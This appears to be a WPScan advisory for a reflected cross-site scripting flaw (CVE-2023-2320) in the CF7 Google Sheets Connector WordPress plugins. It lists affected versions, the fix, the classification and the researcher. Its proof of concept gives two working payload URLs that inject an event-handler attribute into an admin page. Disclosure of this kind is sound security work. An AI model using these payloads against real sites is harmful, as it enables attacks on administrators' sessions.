WordPress Plugin Vulnerabilities

CF7 Google Sheets Connector (Free < 5.0.2, Pro < 2.3.7) - Reflected XSS

Description

The plugins do not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open the URL below

cf7-google-sheets-connector - https://example.com/wp-admin/admin.php?page=wpcf7-google-sheet-config&code="style=animation-name:rotation onanimationstart=alert(/XSS/)//

cf7-google-sheets-connector-pro (when there is already a google token set) - https://example.com/wp-admin/admin.php?page=wpcf7-google-sheet-config&tab=integration&code="style=animation-name:rotation onanimationstart=alert(/XSS/)//

Affects Plugins

Plugin icon
cf7-google-sheets-connector
Fixed in 5.0.2
Plugin icon
cf7-google-sheets-connector-pro
Fixed in 2.3.7

References

CVE
CVE-2023-2320

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
f17ccbaa-2fcd-4f17-a4da-73f2bc8a4fe9

Timeline

Publicly Published
2023-06-12 (about 11 months ago)
Added
2023-06-12 (about 11 months ago)
Last Updated
2023-07-11 (about 10 months ago)

Other

Published
Title
Published
2022-06-20
Title
Popup Builder < 4.1.11 - Admin+ Stored Cross-Site Scripting
Published
2016-04-12
Title
MW Font Changer < 4.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Published
2021-05-12
Title
Weekly Schedule < 3.4.3 - Authenticated Stored XSS
Published
2020-07-12
Title
Form Maker by 10Web < 1.13.40 - Authenticated Reflected XSS
Published
2014-08-01
Title
Zedity <= 2.5.0 - Cross-Site Scripting (XSS)